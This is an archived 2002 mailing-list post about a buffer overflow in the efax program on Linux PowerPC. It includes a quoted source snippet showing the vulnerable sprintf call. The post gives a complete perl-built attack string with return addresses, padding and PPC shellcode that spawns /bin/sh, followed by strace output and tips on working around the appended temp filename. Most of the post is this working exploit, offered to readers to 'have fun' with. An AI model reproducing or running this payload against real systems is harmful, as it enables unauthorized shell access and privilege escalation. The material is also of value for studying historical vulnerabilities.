I was playing with efax on ppc and it is REAL picky about how the
shellcode is layed out... or it could be a problem with a char
in my shellcode also. Regardless the layout is
<returns><nops><shellcode> I have found I must have a trailing 0x2f
if I try this method... otherwise the /sh gets lopped off. It then adds
..0 and then the pid of the process. This is obvious if
you look at the code below provided by s1gnal_9. Here is some strace
dumps and some Ugly perl from
me so have fun. ( perl is NOT my forte) and sorry that my MUI sucks and
chops all my lines up...
[root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print
"\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl
-e
'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f"
x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'`
execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here)
ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"],
[/* 46 vars */]) = 0
...
write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error:
can't open pre-lock file ( returns here )
%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350:
File name too long
) = 1279
execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven:
Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
--- SIGILL (Illegal instruction) ---
If you look here you can see that some how my execve got TMP..01350
appended to it and also a slash becasue
obviously I put it there ... if i didn't add the / my execve would say
execve("/bin/TMP..01350", ["/bin/TMP..01350"] ...
instead I am left to work with the following...
execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven:
Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
it is workable though *grin*...adjust the shellcode a bit and add
TMP..pid on to the end of it ... mkdir /tmp/sh/
and copy a few binarys to TMP..0xxxx
Have fun and if you don't maybe you can work out a better way. (I just
thought of one but I am lazy ... it involves lopping
off sh and just using TMP..pid for the bin).
-KF
+++ killed by SIGILL +++s1gnal_9 wrote:
> More info about the overflow...
>
> Straight from efax src.
>
> <--snip--->
> #define EFAX_PATH_MAX 1024
> <--/snip--->
>
> <--snip--->
> char *p , buf [ EFAX_PATH_MAX ] = "" ;
> <--/snip--->
>
> <--snip--->
> sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ;
> <--/snip--->
> the sprinf above causes the overflow..
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 23:09:34 PST